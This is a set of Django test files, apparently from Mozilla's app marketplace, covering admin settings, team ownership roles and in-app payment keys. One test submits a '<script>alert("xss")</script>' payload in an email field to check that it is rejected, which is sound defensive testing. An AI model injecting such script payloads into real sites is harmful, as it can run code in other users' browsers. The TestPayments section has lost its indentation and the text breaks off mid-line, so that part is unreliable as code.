    def test_edit_no_get_as_nonadmin(self):
        self.log_in_user()
        eq_(self.client.get(self.edit_url).status_code, 403)
    def test_edit_no_post_as_nonadmin(self):
        self.log_in_user()
        eq_(self.client.post(self.edit_url).status_code, 403)
    def post_contact(self, **kw):
        # POST helper: minimum valid payload plus keyword overrides.
        data = {'position': '1',
                'upload_hash': 'abcdef',
                'mozilla_contact': '[email protected]'}
        data.update(kw)
        return self.client.post(self.edit_url, data)
    def test_mozilla_contact(self):
        self.post_contact()
        webapp = self.get_webapp()
        eq_(webapp.mozilla_contact, '[email protected]')
    def test_mozilla_contact_cleared(self):
        self.post_contact(mozilla_contact='')
        webapp = self.get_webapp()
        eq_(webapp.mozilla_contact, '')
    def test_mozilla_contact_invalid(self):
        # An invalid address is rejected and nothing gets saved.
        r = self.post_contact(
            mozilla_contact='<script>alert("xss")</script>@mozilla.com')
        webapp = self.get_webapp()
        self.assertFormError(r, 'form', 'mozilla_contact',
                             'Enter a valid email address.')
        eq_(webapp.mozilla_contact, '')
    def test_vip_app_toggle(self):
        # Turn on.
        data = {
            'position': 1,  # Required, useless in this test.
            'vip_app': 'on'
        }
        r = self.client.post(self.edit_url, data)
        self.assertNoFormErrors(r)
        self.compare({'vip_app': True})
        # And off.
        data.update({'vip_app': ''})
        r = self.client.post(self.edit_url, data)
        self.compare({'vip_app': False})
    def test_priority_review_toggle(self):
        # Turn on.
        data = {
            'position': 1,  # Required, useless in this test.
            'priority_review': 'on'
        }
        r = self.client.post(self.edit_url, data)
        self.assertNoFormErrors(r)
        self.compare({'priority_review': True})
        # And off.
        data = {'position': 1}
        r = self.client.post(self.edit_url, data)
        self.compare({'priority_review': False})
    def test_staff(self):
        # Staff and Support Staff should have Apps:Configure.
        self.log_in_with('Apps:Configure')
        # Test GET.
        r = self.client.get(self.edit_url)
        eq_(r.status_code, 200)
        eq_(pq(r.content)('form').length, 1)
        assert r.context.get('form'), 'Admin Settings form expected in context'
        # Test POST. Ignore errors.
        eq_(self.client.post(self.edit_url).status_code, 200)
    def test_developer(self):
        # Developers have read-only on admin section.
        self.log_in_with('Apps:ViewConfiguration')
        # Test GET.
        r = self.client.get(self.edit_url)
        eq_(r.status_code, 200)
        eq_(pq(r.content)('form').length, 1)
        assert r.context.get('form'), 'Admin Settings form expected in context'
        # Test POST. Ignore errors.
        eq_(self.client.post(self.edit_url).status_code, 403)
    def test_banner_region_view(self):
        # The read-only view shows the saved banner message and regions.
        self.log_in_with('Apps:ViewConfiguration')
        geodata = self.get_webapp().geodata
        geodata.banner_message = u'Exclusive message ! Only for AR/BR !'
        geodata.banner_regions = [mkt.regions.BR.id, mkt.regions.AR.id]
        geodata.save()
        res = self.client.get(self.url)
        eq_(pq(res.content)('#id_banner_message').text(),
            unicode(geodata.banner_message))
        eq_(pq(res.content)('#id_banner_regions').text(), u'Argentina, Brazil')
    def test_banner_region_edit(self):
        # The edit form renders one checkbox per region with the two saved
        # regions checked (AR appears before BR in the rendered output).
        self.log_in_with('Apps:ViewConfiguration')
        geodata = self.webapp.geodata
        geodata.banner_message = u'Exclusive message ! Only for AR/BR !'
        geodata.banner_regions = [mkt.regions.BR.id, mkt.regions.AR.id]
        geodata.save()
        AER.objects.create(addon=self.webapp, region=mkt.regions.US.id)
        res = self.client.get(self.edit_url)
        eq_(res.status_code, 200)
        doc = pq(res.content)
        inputs = doc.find('input[type=checkbox][name=banner_regions]')
        eq_(inputs.length, len(mkt.regions.REGIONS_CHOICES_ID))
        checked = doc.find('#id_banner_regions input[type=checkbox]:checked')
        eq_(checked.length, 2)
        eq_(checked[0].name, 'banner_regions')
        eq_(checked[0].value, unicode(mkt.regions.AR.id))
        eq_(pq(checked[0]).parents('li').attr('data-region'),
            unicode(mkt.regions.AR.id))
        eq_(checked[1].name, 'banner_regions')
        eq_(checked[1].value, unicode(mkt.regions.BR.id))
        eq_(pq(checked[1]).parents('li').attr('data-region'),
            unicode(mkt.regions.BR.id))
    def test_banner_region_edit_post(self):
        # Posting saves both the localized message and the region list.
        data = {
            'position': 1,  # Required, useless in this test.
            'banner_regions': [unicode(mkt.regions.BR.id),
                               unicode(mkt.regions.SPAIN.id)],
            'banner_message_en-us': u'Oh Hai.',
        }
        res = self.client.post(self.edit_url, data)
        eq_(res.status_code, 200)
        geodata = self.webapp.geodata.reload()
        eq_(geodata.banner_message, data['banner_message_en-us'])
        eq_(geodata.banner_regions, [mkt.regions.BR.id, mkt.regions.SPAIN.id])
class TestPromoUpload(TestAdmin):
    """Tests for adding and removing an app's promo via the admin form."""
    fixtures = TestEdit.fixtures

    def post(self, **kw):
        payload = {'position': '1', 'upload_hash': 'abcdef'}
        payload.update(kw)
        self.client.post(self.edit_url, payload)

    def test_add(self):
        self.post()
        webapp = self.get_webapp()
        eq_(webapp.previews.count(), 1)
        # The promo is stored as a preview at position -1, so it must be
        # excluded from the regular preview listing.
        eq_(list(webapp.get_previews()), [])
        eq_(webapp.get_promo().position, -1)

    def test_delete(self):
        self.post()
        assert self.get_webapp().get_promo()
        self.post(DELETE=True)
        assert not self.get_webapp().get_promo()
class TestEditVersion(TestEdit):
    """Tests for the per-version edit view of a packaged app."""
    fixtures = fixture('group_admin', 'user_999', 'user_admin',
                       'user_admin_group', 'webapp_337141')
    def setUp(self):
        self.webapp = self.get_webapp()
        self.webapp.update(is_packaged=True)
        self.version_pk = self.webapp.latest_version.pk
        self.url = reverse('mkt.developers.apps.versions.edit', kwargs={
            'version_id': self.version_pk,
            'app_slug': self.webapp.app_slug
        })
        self.user = UserProfile.objects.get(username='31337')
        self.login(self.user)
    def test_post(self, **kwargs):
        # Doubles as a helper for the other tests: posts the form (with
        # keyword overrides) and returns the freshly-loaded version.
        data = {'releasenotes_init': '',
                'releasenotes_en-us': 'Hot new version',
                'approvalnotes': 'The release notes are true.',
                'has_audio': False,
                'has_apps': False}
        data.update(kwargs)
        req = self.client.post(self.url, data)
        eq_(req.status_code, 302)
        version = Version.objects.no_cache().get(pk=self.version_pk)
        eq_(version.releasenotes, data['releasenotes_en-us'])
        eq_(version.approvalnotes, data['approvalnotes'])
        return version
    def test_comm_thread(self):
        # Approval notes create a communication note, but only when
        # non-empty.
        self.create_switch('comm-dashboard')
        # With empty note.
        self.test_post(approvalnotes='')
        eq_(CommunicationNote.objects.count(), 0)
        self.test_post(approvalnotes='abc')
        notes = CommunicationNote.objects.all()
        eq_(notes.count(), 1)
        eq_(notes[0].body, 'abc')
    def test_existing_features_initial_form_data(self):
        # Saved feature flags must pre-populate the features form.
        features = self.webapp.current_version.features
        features.update(has_audio=True, has_apps=True)
        r = self.client.get(self.url)
        eq_(r.context['appfeatures_form'].initial,
            dict(id=features.id, **features.to_dict()))
    def test_new_features(self):
        assert not RereviewQueue.objects.filter(addon=self.webapp).exists()
        # Turn a feature on.
        version = self.test_post(has_audio=True)
        ok_(version.features.has_audio)
        ok_(not version.features.has_apps)
        # Then turn the feature off.
        version = self.test_post(has_audio=False)
        ok_(not version.features.has_audio)
        ok_(not version.features.has_apps)
        # Changing features must trigger re-review.
        assert RereviewQueue.objects.filter(addon=self.webapp).exists()
    def test_correct_version_features(self):
        # Editing must hit the version addressed by the URL
        # (self.version_pk), not whatever is currently the latest.
        new_version = self.webapp.latest_version.update(id=self.version_pk + 1)
        self.webapp.update(_latest_version=new_version)
        self.test_new_features()
    def test_publish_checkbox_presence(self):
        # The publish-immediately checkbox only shows for pending files.
        res = self.client.get(self.url)
        ok_(not pq(res.content)('#id_publish_immediately'))
        self.webapp.latest_version.files.update(status=amo.STATUS_PENDING)
        res = self.client.get(self.url)
        ok_(pq(res.content)('#id_publish_immediately'))
########NEW FILE########
__FILENAME__ = test_views_ownership
import datetime
from django.core.urlresolvers import reverse
from nose.tools import eq_
from pyquery import PyQuery as pq
import waffle
import amo
import amo.tests
from amo.tests import formset
from addons.models import Addon, AddonUser
from devhub.models import ActivityLog
from mkt.site.fixtures import fixture
from users.models import UserProfile
class TestOwnership(amo.tests.TestCase):
    """Shared setup for the app ownership (team members) page tests."""
    fixtures = ['base/apps', 'base/users'] + fixture('webapp_337141')

    def setUp(self):
        self.webapp = self.get_webapp()
        self.url = self.webapp.get_dev_url('owner')
        assert self.client.login(username='[email protected]',
                                 password='password')
        # Users are required to have read the dev agreement to become owners.
        now = datetime.datetime.now()
        UserProfile.objects.filter(id__in=[31337, 999]).update(
            read_dev_agreement=now)

    def formset(self, *args, **kw):
        # Thin wrapper so subclasses can customize formset construction.
        return formset(*args, **kw)

    def get_webapp(self):
        return Addon.objects.no_cache().get(id=337141)
class TestEditAuthor(TestOwnership):
    """Tests for adding, editing, reordering and removing team members."""

    def test_reorder_authors(self):
        """
        Re-ordering authors should not generate role changes in the
        ActivityLog.
        """
        # flip form-0-position
        f = self.client.get(self.url).context['user_form'].initial_forms[0]
        u = dict(user='[email protected]', listed=True,
                 role=amo.AUTHOR_ROLE_DEV, position=0)
        data = self.formset(f.initial, u, initial_count=1)
        r = self.client.post(self.url, data)
        eq_(r.status_code, 302)
        f = self.client.get(self.url).context['user_form'].initial_forms[0]
        u1 = f.initial
        u1['position'] = 1
        f = self.client.get(self.url).context['user_form'].initial_forms[1]
        u2 = f.initial
        data = self.formset(u1, u2)
        orig = ActivityLog.objects.all().count()
        r = self.client.post(self.url, data)
        self.assertRedirects(r, self.url, 302)
        eq_(ActivityLog.objects.all().count(), orig)

    def test_success_add_user(self):
        # Adding a second, valid user appends them to the author list.
        q = (AddonUser.objects.no_cache().filter(addon=self.webapp.id)
             .values_list('user', flat=True))
        eq_(list(q.all()), [31337])
        f = self.client.get(self.url).context['user_form'].initial_forms[0]
        u = dict(user='[email protected]', listed=True,
                 role=amo.AUTHOR_ROLE_DEV, position=0)
        data = self.formset(f.initial, u, initial_count=1)
        r = self.client.post(self.url, data)
        self.assertRedirects(r, self.url, 302)
        eq_(list(q.all()), [31337, 999])

    def test_success_edit_user(self):
        # Add an author b/c we can't edit anything about the current one.
        f = self.client.get(self.url).context['user_form'].initial_forms[0]
        u = dict(user='[email protected]', listed=True,
                 role=amo.AUTHOR_ROLE_DEV, position=1)
        data = self.formset(f.initial, u, initial_count=1)
        self.client.post(self.url, data)
        eq_(AddonUser.objects.get(addon=self.webapp.id, user=999).listed, True)
        # Edit the user we just added.
        user_form = self.client.get(self.url).context['user_form']
        one, two = user_form.initial_forms
        del two.initial['listed']
        empty = dict(user='', listed=True, role=5, position=0)
        data = self.formset(one.initial, two.initial, empty, initial_count=2)
        r = self.client.post(self.url, data)
        self.assertRedirects(r, self.url, 302)
        eq_(AddonUser.objects.get(addon=self.webapp.id, user=999).listed,
            False)

    def test_add_user_twice(self):
        # The same address may only appear once in the formset.
        f = self.client.get(self.url).context['user_form'].initial_forms[0]
        u = dict(user='[email protected]', listed=True,
                 role=amo.AUTHOR_ROLE_DEV, position=1)
        data = self.formset(f.initial, u, u, initial_count=1)
        r = self.client.post(self.url, data)
        eq_(r.status_code, 200)
        eq_(r.context['user_form'].non_form_errors(),
            ['A team member can only be listed once.'])

    def test_success_delete_user(self):
        # Add a new user so we have one to delete.
        data = self.formset(dict(user='[email protected]', listed=True,
                                 role=amo.AUTHOR_ROLE_OWNER, position=1),
                            initial_count=0)
        self.client.post(self.url, data)
        one, two = self.client.get(self.url).context['user_form'].initial_forms
        one.initial['DELETE'] = True
        data = self.formset(one.initial, two.initial, initial_count=2)
        r = self.client.post(self.url, data)
        eq_(r.status_code, 302)
        eq_(AddonUser.objects.get(addon=self.webapp.id).user_id, 999)

    def test_delete_own_access(self):
        # Add a new user and then delete the first user.
        data = self.formset(dict(user='[email protected]', listed=True,
                                 role=amo.AUTHOR_ROLE_OWNER, position=1),
                            initial_count=0)
        self.client.post(self.url, data)
        one, two = self.client.get(self.url).context['user_form'].initial_forms
        one.initial['DELETE'] = True
        data = self.formset(one.initial, two.initial, initial_count=2)
        r = self.client.post(self.url, data)
        # We should be redirected to our My submissions page since we have
        # now lost access to the current app by deleting our own access.
        self.assertRedirects(r, reverse('mkt.developers.apps'), 302)

    def test_switch_owner(self):
        # See if we can transfer ownership in one POST.
        f = self.client.get(self.url).context['user_form'].initial_forms[0]
        f.initial['user'] = '[email protected]'
        data = self.formset(f.initial, initial_count=1)
        r = self.client.post(self.url, data)
        eq_(r.status_code, 302)
        eq_(AddonUser.objects.get(addon=self.webapp.id).user_id, 999)
        eq_(ActivityLog.objects.filter(
            action=amo.LOG.ADD_USER_WITH_ROLE.id).count(), 1)
        eq_(ActivityLog.objects.filter(
            action=amo.LOG.REMOVE_USER_WITH_ROLE.id).count(), 1)

    def test_only_owner_can_edit(self):
        # A developer-role author may neither edit nor delete authors.
        f = self.client.get(self.url).context['user_form'].initial_forms[0]
        u = dict(user='[email protected]', listed=True,
                 role=amo.AUTHOR_ROLE_DEV, position=0)
        data = self.formset(f.initial, u, initial_count=1)
        self.client.post(self.url, data)
        self.client.login(username='[email protected]', password='password')
        self.client.post(self.url, data, follow=True)
        # Try deleting the other AddonUser.
        one, two = self.client.get(self.url).context['user_form'].initial_forms
        one.initial['DELETE'] = True
        data = self.formset(one.initial, two.initial, initial_count=2)
        r = self.client.post(self.url, data, follow=True)
        eq_(r.status_code, 403)
        eq_(AddonUser.objects.filter(addon=self.webapp.id).count(), 2)

    def test_must_have_listed(self):
        f = self.client.get(self.url).context['user_form'].initial_forms[0]
        f.initial['listed'] = False
        data = self.formset(f.initial, initial_count=1)
        r = self.client.post(self.url, data)
        eq_(r.context['user_form'].non_form_errors(),
            ['At least one team member must be listed.'])

    def test_must_have_owner(self):
        f = self.client.get(self.url).context['user_form'].initial_forms[0]
        f.initial['role'] = amo.AUTHOR_ROLE_DEV
        data = self.formset(f.initial, initial_count=1)
        r = self.client.post(self.url, data)
        eq_(r.context['user_form'].non_form_errors(),
            ['Must have at least one owner.'])

    def test_must_have_owner_delete(self):
        f = self.client.get(self.url).context['user_form'].initial_forms[0]
        f.initial['DELETE'] = True
        data = self.formset(f.initial, initial_count=1)
        r = self.client.post(self.url, data)
        eq_(r.context['user_form'].non_form_errors(),
            ['Must have at least one owner.'])

    def test_author_support_role(self):
        # Tests that the support role shows up when the allow-refund switch
        # is active.
        switch = waffle.models.Switch.objects.create(name='allow-refund',
                                                     active=True)
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        doc = pq(res.content)
        role_str = doc('#id_form-0-role').text()
        assert 'Support' in role_str, ('Support not in roles. Contained: %s' %
                                       role_str)
        switch.active = False
        switch.save()
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        doc = pq(res.content)
        # PEP 8: use the `not in` membership operator.
        assert 'Support' not in doc('#id_form-0-role').text(), (
            "Hey, the Support role shouldn't be here!")
class TestEditWebappAuthors(amo.tests.TestCase):
    """Tests for the owners page rendered in the webapp (dev hub) context."""
    fixtures = ['base/apps', 'base/users'] + fixture('webapp_337141')

    def setUp(self):
        self.client.login(username='[email protected]', password='password')
        self.webapp = Addon.objects.get(id=337141)
        self.url = self.webapp.get_dev_url('owner')

    def test_apps_context(self):
        res = self.client.get(self.url)
        eq_(res.context['webapp'], True)
        assert 'license_form' not in res.context, 'Unexpected license form'
        assert 'policy_form' not in res.context, 'Unexpected policy form'
        doc = pq(res.content)
        # The fourth link of the first edit-nav list points at this page.
        nav_href = doc('.edit-addon-nav ul').eq(0).find('a').eq(3).attr('href')
        eq_(nav_href, self.url)

    def test_success_add_owner(self):
        profile = UserProfile.objects.get(id=999)
        new_owner = dict(user=profile.email, listed=True,
                         role=amo.AUTHOR_ROLE_OWNER, position=0)
        res = self.client.post(self.url, formset(new_owner, initial_count=0))
        self.assertRedirects(res, self.url, 302)
        owners = (AddonUser.objects.filter(addon=self.webapp.id)
                  .values_list('user', flat=True))
        eq_(list(owners), [31337, 999])
class TestDeveloperRoleAccess(amo.tests.TestCase):
    """A developer-role team member only gets read-only access."""
    fixtures = fixture('user_999', 'webapp_337141')

    def setUp(self):
        self.client.login(username='[email protected]', password='password')
        self.webapp = Addon.objects.get(pk=337141)
        self.webapp.update(premium_type=amo.ADDON_PREMIUM)
        developer = UserProfile.objects.get(email='[email protected]')
        AddonUser.objects.create(addon=self.webapp, user=developer,
                                 role=amo.AUTHOR_ROLE_DEV)

    def _check_it(self, url):
        response = self.client.get(url, follow=True)
        eq_(response.status_code, 200)
        # Weak sauce. But pq('body.no-edit') or
        # pq('body').hasClass('no-edit') doesn't work.
        assert 'no-edit' in response.content, (
            "%s is editable by a developer but shouldn't be" % url)
        response = self.client.post(url)
        eq_(response.status_code, 403)

    def test_urls(self):
        for url in ['owner']:
            self._check_it(self.webapp.get_dev_url(url))

    def test_disable(self):
        # Developers may disable the app but never delete it.
        response = self.client.get(self.webapp.get_dev_url('versions'))
        doc = pq(response.content)
        eq_(doc('#delete-addon').length, 0)
        eq_(doc('#disable-addon').length, 1)

    def test_enable(self):
        self.webapp.update(disabled_by_user=True)
        response = self.client.get(self.webapp.get_dev_url('versions'))
        doc = pq(response.content)
        eq_(doc('#delete-addon').length, 0)
        eq_(doc('#enable-addon').length, 1)
########NEW FILE########
__FILENAME__ = test_views_payments
# -*- coding: utf-8 -*-
import json
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import reverse
import mock
from curling.lib import HttpClientError
from mock import ANY
from nose.tools import eq_, ok_
from pyquery import PyQuery as pq
from waffle.models import Switch
import amo
import amo.tests
import mkt
from addons.models import (Addon, AddonDeviceType, AddonPremium, AddonUpsell,
AddonUser, Category)
from constants.payments import (PAYMENT_METHOD_ALL, PAYMENT_METHOD_CARD,
PAYMENT_METHOD_OPERATOR, PROVIDER_BANGO,
PROVIDER_BOKU, PROVIDER_REFERENCE)
from mkt.constants.payments import ACCESS_PURCHASE, ACCESS_SIMULATE
from mkt.constants.regions import ALL_REGION_IDS, SPAIN, US, UK
from mkt.developers.models import (AddonPaymentAccount, PaymentAccount,
SolitudeSeller, UserInappKey)
from mkt.developers.tests.test_providers import Patcher
from mkt.developers.views_payments import (get_inapp_config,
require_in_app_payments)
from mkt.site.fixtures import fixture
from mkt.webapps.models import AddonExcludedRegion as AER
from mkt.prices.models import Price
from users.models import UserProfile
# Arbitrary package id; it only needs to differ from the default of 1.
TEST_PACKAGE_ID = '2'
def setup_payment_account(app, user, uid='uid', package_id=TEST_PACKAGE_ID):
    """Create a seller and payment account for `user`, attached to `app`.

    Returns the AddonPaymentAccount linking the app to the new account.
    """
    seller = SolitudeSeller.objects.create(user=user, uuid=uid)
    account = PaymentAccount.objects.create(
        user=user, solitude_seller=seller, agreed_tos=True,
        seller_uri=uid, uri=uid, account_id=package_id)
    return AddonPaymentAccount.objects.create(
        addon=app, product_uri='/path/to/%s/' % app.pk,
        account_uri=account.uri, payment_account=account)
class InappTest(amo.tests.TestCase):
    """Base class for in-app payment view tests.

    Provides a free-with-in-app app owned by self.user, a payment
    account, and a mocked Solitude API client exposed as self.api.
    """
    fixtures = fixture('webapp_337141', 'user_999')
    def setUp(self):
        self.public_id = 'app-public-id'
        self.pay_key_secret = 'hex-secret-for-in-app-payments'
        self.generic_product_id = '1'
        self.app = Addon.objects.get(pk=337141)
        self.app.update(premium_type=amo.ADDON_FREE_INAPP,
                        solitude_public_id=self.public_id)
        self.user = UserProfile.objects.get(pk=31337)
        self.other = UserProfile.objects.get(pk=999)
        self.login(self.user)
        self.account = setup_payment_account(self.app, self.user)
        self.url = reverse('mkt.developers.apps.in_app_config',
                           args=[self.app.app_slug])
        # Patch the Solitude client for the duration of each test.
        p = mock.patch('mkt.developers.views_payments.client.api')
        self.api = p.start()
        self.addCleanup(p.stop)
    def set_mocks(self):
        """
        Set up mocks to allow in-app payment configuration.
        """
        product = {
            'resource_pk': self.generic_product_id,
            'secret': self.pay_key_secret
        }
        self.api.generic.product.get_object.return_value = product
        self.api.generic.product.get_object_or_404.return_value = product
class TestInappConfig(InappTest):
    """Tests for the in-app payment configuration view."""
    def test_key_generation(self):
        # Resetting the config patches a fresh secret onto the Solitude
        # product.
        self.set_mocks()
        self.client.post(self.url, {})
        self.api.generic.product.assert_called_with(self.generic_product_id)
        args = self.api.generic.product().patch.call_args
        assert 'secret' in args[1]['data']
    def test_when_logged_out(self):
        self.client.logout()
        self.assertLoginRequired(self.client.get(self.url))
    def test_non_team_member_cannot_get_config(self):
        self.login(self.other)
        eq_(self.client.get(self.url).status_code, 403)
    def test_other_developer_can_get_config(self):
        self.login(self.other)
        AddonUser.objects.create(addon=self.app, user=self.other,
                                 role=amo.AUTHOR_ROLE_DEV)
        # Developer can read, but not reset.
        eq_(self.client.get(self.url).status_code, 200)
        eq_(self.client.post(self.url).status_code, 403)
    def test_not_inapp(self):
        # Apps without an in-app premium type are redirected away.
        self.app.update(premium_type=amo.ADDON_PREMIUM)
        eq_(self.client.get(self.url).status_code, 302)
    def test_no_pay_account(self):
        # Apps without a payment account are redirected away.
        self.app.app_payment_accounts.all().delete()
        eq_(self.client.get(self.url).status_code, 302)
@require_in_app_payments
def render_in_app_view(request, addon_id, addon, *args, **kwargs):
    # Minimal view wrapped by the decorator under test; reaching the body
    # means the decorator allowed the request through.
    return 'The view was rendered'
class TestRequireInAppPayments(amo.tests.TestCase):
    """Unit tests for the require_in_app_payments view decorator."""
    def good_app(self):
        # A mock app that satisfies the decorator: an in-app premium type
        # plus a configured payment account.
        addon = mock.Mock(premium_type=amo.ADDON_INAPPS[0], app_slug='foo')
        addon.has_payment_account.return_value = True
        return addon
    def test_inapp(self):
        response = render_in_app_view(addon=self.good_app(), request=None,
                                      addon_id=None)
        eq_(response, 'The view was rendered')
    @mock.patch('amo.messages.error')
    def test_not_inapp(self, error):
        # A non in-app premium type gets redirected away from the view.
        addon = self.good_app()
        addon.premium_type = amo.ADDON_FREE
        response = render_in_app_view(addon=addon, request=None, addon_id=None)
        eq_(response.status_code, 302)
    @mock.patch('amo.messages.error')
    def test_no_pay_account(self, error):
        # A missing payment account gets redirected too.
        addon = self.good_app()
        addon.has_payment_account.return_value = False
        response = render_in_app_view(addon=addon, request=None, addon_id=None)
        eq_(response.status_code, 302)
class TestGetInappConfig(InappTest):
    """Tests for the get_inapp_config() helper."""

    def setUp(self):
        super(TestGetInappConfig, self).setUp()
        product = {
            'secret': self.pay_key_secret,
            'public_id': self.public_id,
        }
        self.api.generic.product.get_object.return_value = product

    def test_ok(self):
        config = get_inapp_config(self.app)
        eq_(config['public_id'], self.app.solitude_public_id)

    def test_not_configured(self):
        # An app with no Solitude public id cannot be configured.
        self.app.update(solitude_public_id=None)
        with self.assertRaises(ValueError):
            get_inapp_config(self.app)
class TestInAppProductsView(InappTest):
    """Tests for the in-app products page, gated by a waffle switch."""

    def setUp(self):
        super(TestInAppProductsView, self).setUp()
        self.waffle = Switch.objects.create(name='in-app-products',
                                            active=True)
        self.url = reverse('mkt.developers.apps.in_app_products',
                           args=[self.app.app_slug])

    def get(self):
        return self.client.get(self.url)

    def test_finds_products(self):
        response = self.get()
        eq_(response.status_code, 200)

    def test_requires_author(self):
        # Users outside the app's team get a 403.
        self.login(self.other)
        response = self.get()
        eq_(response.status_code, 403)

    def test_without_waffle(self):
        # With the switch disabled the page should not exist.
        self.waffle.active = False
        self.waffle.save()
        response = self.get()
        eq_(response.status_code, 404)
class TestInappSecret(InappTest):
    """Tests for the view exposing an app's in-app payment secret."""
    def setUp(self):
        super(TestInappSecret, self).setUp()
        self.url = reverse('mkt.developers.apps.in_app_secret',
                           args=[self.app.app_slug])
    def test_show_secret(self):
        self.set_mocks()
        resp = self.client.get(self.url)
        eq_(resp.content, self.pay_key_secret)
        # The product is looked up by the app's Solitude public id.
        self.api.generic.product.get_object.assert_called_with(
            public_id=self.public_id)
    def test_when_logged_out(self):
        self.client.logout()
        self.assertLoginRequired(self.client.get(self.url))
    def test_non_team_member_cannot_get_secret(self):
        self.client.login(username='[email protected]', password='password')
        eq_(self.client.get(self.url).status_code, 403)
    def test_other_developers_can_access_secret(self):
        # Unlike config resets, reading the secret is open to dev-role
        # team members as well.
        self.set_mocks()
        self.login(self.other)
        AddonUser.objects.create(addon=self.app, user=self.other,
                                 role=amo.AUTHOR_ROLE_DEV)
        resp = self.client.get(self.url)
        eq_(resp.content, self.pay_key_secret)
class InappKeysTest(InappTest):
    """Shared setup for the developer in-app key management views."""

    def setUp(self):
        super(InappKeysTest, self).setUp()
        self.url = reverse('mkt.developers.apps.in_app_keys')
        self.seller_uri = '/seller/1/'
        self.product_pk = 2

    def setup_solitude(self):
        # Stub the Solitude responses for seller and product creation.
        seller = {'resource_uri': self.seller_uri}
        product = {'resource_pk': self.product_pk}
        self.api.generic.seller.post.return_value = seller
        self.api.generic.product.post.return_value = product
class TestInappKeys(InappKeysTest):
    """Tests for creating and resetting a developer's simulation key."""
    def test_logged_out(self):
        self.client.logout()
        self.assertLoginRequired(self.client.get(self.url))
    def test_no_key(self):
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        eq_(res.context['key'], None)
    def test_key_generation(self):
        # The first POST creates a Solitude seller + product and stores a
        # UserInappKey with simulation-only access.
        self.setup_solitude()
        res = self.client.post(self.url)
        ok_(res['Location'].endswith(self.url), res)
        ok_(self.api.generic.seller.post.called)
        ok_(self.api.generic.product.post.called)
        key = UserInappKey.objects.get()
        eq_(key.solitude_seller.resource_uri, self.seller_uri)
        eq_(key.seller_product_pk, self.product_pk)
        m = self.api.generic.product.post.mock_calls
        eq_(m[0][2]['data']['access'], ACCESS_SIMULATE)
    @mock.patch('mkt.developers.models.UserInappKey.public_id')
    def test_reset(self, mock_public_id):
        # Posting with an existing key patches a new secret in Solitude.
        self.setup_solitude()
        key = UserInappKey.create(self.user)
        product = mock.Mock()
        self.api.generic.product.return_value = product
        self.client.post(self.url)
        product.patch.assert_called_with(data={'secret': ANY})
        self.api.generic.product.assert_called_with(key.seller_product_pk)
    def test_keys_page_renders_when_solitude_raises_404(self):
        # Solitude errors must not break the page.
        UserInappKey.create(self.user)
        self.api.generic.product.side_effect = HttpClientError()
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        # Test that a message is sent to the user
        eq_(len(res.context['messages']), 1)
class TestInappKeySecret(InappKeysTest):
    """Tests for the view returning a simulation key's secret."""
    def setup_objects(self):
        # Create a key for self.user and point self.url at its secret view.
        self.setup_solitude()
        key = UserInappKey.create(self.user)
        self.url = reverse('mkt.developers.apps.in_app_key_secret',
                           args=[key.pk])
    def test_logged_out(self):
        self.setup_objects()
        self.client.logout()
        self.assertLoginRequired(self.client.get(self.url))
    def test_different(self):
        # Another user's key secret is off limits.
        self.setup_objects()
        self.login(self.other)
        eq_(self.client.get(self.url).status_code, 403)
    def test_secret(self):
        self.setup_objects()
        secret = 'not telling'
        product = mock.Mock()
        product.get.return_value = {'secret': secret}
        self.api.generic.product.return_value = product
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        eq_(res.content, secret)
class TestPayments(Patcher, amo.tests.TestCase):
fixtures = fixture('webapp_337141', 'user_999', 'group_admin',
'user_admin', 'user_admin_group', 'prices')
def setUp(self):
super(TestPayments, self).setUp()
self.webapp = self.get_webapp()
AddonDeviceType.objects.create(
addon=self.webapp, device_type=amo.DEVICE_GAIA.id)
self.url = self.webapp.get_dev_url('payments')
self.user = UserProfile.objects.get(pk=31337)
self.other = UserProfile.objects.get(pk=999)
self.admin = UserProfile.objects.get(email='[email protected]')
# Default to logging in as the app owner.
self.login(self.user)
self.price = Price.objects.filter()[0]
def get_webapp(self):
return Addon.objects.get(pk=337141)
def get_region_list(self):
return list(AER.objects.values_list('region', flat=True))
def get_postdata(self, extension):
base = {'regions': self.get_region_list(),
'free_platforms': ['free-%s' % dt.class_name for dt in
self.webapp.device_types],
'paid_platforms': ['paid-%s' % dt.class_name for dt in
self.webapp.device_types]}
if 'accounts' in extension:
extension['form-TOTAL_FORMS'] = 1
extension['form-INITIAL_FORMS'] = 1
extension['form-MAX_NUM_FORMS'] = 1
extension['form-0-accounts'] = extension['accounts']
del extension['accounts']
base.update(extension)
return base
# --- Free/paid toggling and payments-page rendering tests. ---

def test_free(self):
    # Toggling to 'free' keeps the app free; context reports unpaid.
    res = self.client.post(
        self.url, self.get_postdata({'toggle-paid': 'free'}), follow=True)
    eq_(self.get_webapp().premium_type, amo.ADDON_FREE)
    eq_(res.context['is_paid'], False)

def test_premium_passes(self):
    # Toggling a free app to 'paid' flips it to premium.
    self.webapp.update(premium_type=amo.ADDON_FREE)
    res = self.client.post(self.url,
                           self.get_postdata({'toggle-paid': 'paid'}),
                           follow=True)
    eq_(self.get_webapp().premium_type, amo.ADDON_PREMIUM)
    eq_(res.context['is_paid'], True)

def test_check_api_url_in_context(self):
    # The price-list API endpoint is exposed to the template.
    self.webapp.update(premium_type=amo.ADDON_FREE)
    res = self.client.get(self.url)
    eq_(res.context['api_pricelist_url'], reverse('price-list'))

def test_regions_display_free(self):
    # Free apps show the free regions island only.
    self.webapp.update(premium_type=amo.ADDON_FREE)
    res = self.client.get(self.url)
    pqr = pq(res.content)
    eq_(len(pqr('#regions-island')), 1)
    eq_(len(pqr('#paid-regions-island')), 0)

def test_regions_display_premium(self):
    # Premium apps show the paid regions island only.
    self.webapp.update(premium_type=amo.ADDON_PREMIUM)
    res = self.client.get(self.url)
    pqr = pq(res.content)
    eq_(len(pqr('#regions-island')), 0)
    eq_(len(pqr('#paid-regions-island')), 1)

def test_free_with_in_app_tier_id_in_content(self):
    # The zero-price tier pk is embedded as a data attribute for the JS.
    price_tier_zero = Price.objects.get(price='0.00')
    self.webapp.update(premium_type=amo.ADDON_PREMIUM)
    res = self.client.get(self.url)
    pqr = pq(res.content)
    eq_(len(pqr('#region-list[data-tier-zero-id]')), 1)
    eq_(int(pqr('#region-list').attr(
